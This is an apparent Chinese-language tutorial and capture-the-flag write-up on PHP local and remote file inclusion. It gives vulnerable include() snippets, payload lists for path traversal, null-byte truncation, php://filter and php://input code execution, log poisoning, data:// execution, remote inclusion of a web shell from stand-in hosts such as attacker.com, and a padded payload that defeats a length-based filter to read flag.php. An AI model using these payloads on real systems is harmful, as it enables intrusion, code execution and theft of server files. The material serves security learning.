文件包含2

远程文件包含与本地文件包含的区别

对比

例子对比

本地文件包含（LFI）

源代码的关键代码

include($_GET['file'] . '.php');

【这个代码对参数进行了处理，即在参数后面增加了一个.php的后缀，这就是将任何参数都转为了一个php文件】

 攻击者的payload

?file=../../etc/passwd%00  # 读取系统文件
?file=php://filter/convert.base64-encode/resource=config.php  # 读取PHP源码

 远程文件包含（RFI）

源代码的关键代码

include($_GET['url']);  // 未过滤直接包含远程文件

攻击者的payload

?url=http://evil.com/shell.txt  # 包含远程Web Shell
?url=data://text/plain,<?php system("ls");?>  # 直接执行代码

根据这两个例子的对比就可以看到其实二者从源代码其实是很难分辨出来，但是对于传入的payload却是有所不同的

本地文件包含的payload主要是文件路径（../../ ）和php包装（php://）

远程文件包含的payload主要是url协议（比如：http://  或  ftp://等）

payload

LFI典型Payload示例

(1) 读取敏感文件

?file=../../../../etc/passwd
?page=/var/www/html/config.php

(2) 路径遍历绕过

?file=....//....//etc/passwd      # 双重编码绕过
?file=%2e%2e%2fetc%2fpasswd      # URL编码

(3) PHP包装器利用

?file=php://filter/convert.base64-encode/resource=index.php  # 读取PHP源码
?file=php://input              # 通过POST传入代码
[POST DATA]: <?php system("id");?>

(4) 日志文件注入

?file=/var/log/apache2/access.log
# 需先通过User-Agent或Referer注入PHP代码

(5) Null字节截断 (PHP < 5.3.4)

?file=../../etc/passwd%00      # 截断后缀

RFI典型Payload示例

(1) 基本远程包含

?file=http://attacker.com/shell.txt
?lib=ftp://evil.net/cmd.php

(2) 自动附加后缀的绕过

?file=http://attacker.com/shell.txt?   # 问号截断
?file=http://attacker.com/shell.txt%00 # Null字节截断

(3) data协议利用 (伪RFI)

?file=data://text/plain,<?php system("id");?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOz8+

(4) 结合短标签

?file=http://attacker.com/shell.txt&cmd=id
# shell.txt内容: <?=`$_GET[cmd]`?>

做个题

[鹏城杯 2022]简单包含

打开环境后得到的源码

这里看到直接告诉了flag的位置，  那么就猜测是一个 本地文件包含

直接去访问这个文件竟然输出waf

那看来这个有问题

试试php伪协议

在hackbar中可以看到有直接的php伪协议模板然后我们点击后复制到POST中进行传参还是不行，去访问一下index.php看一下源码

去base64解码得到源码

<?php$path = $_POST["flag"];if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {Secho 'nssctf waf!';
} else {@include($path);
}
?>
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php&nbsp;<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag&nbsp;in&nbsp;/var/www/html/flag.php;</span>
</span>
</code><br />

这里的关键代码就是if语句那一段

大致就是当所输入的字符长度小于八百且正则检测flag字符时就会输出“nssctf waf!”

这里拓展两个知识

与常见输入方法的对比

file_get_contents()函数

该函数的作用是将某文件读取为字符串

比如这里就是将php://输入流的所有内容读取为字符串，来确保strlen()函数的实现。

 那么我们的payload就应该是前面有长度为800的字符，然后再输入我们的php伪协议

我的payload

1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&flag=php://filter/convert.base64-encode/resource=flag.php

或者直接访问源代码所给的文件路径

得到的编码进行base64解码就可以了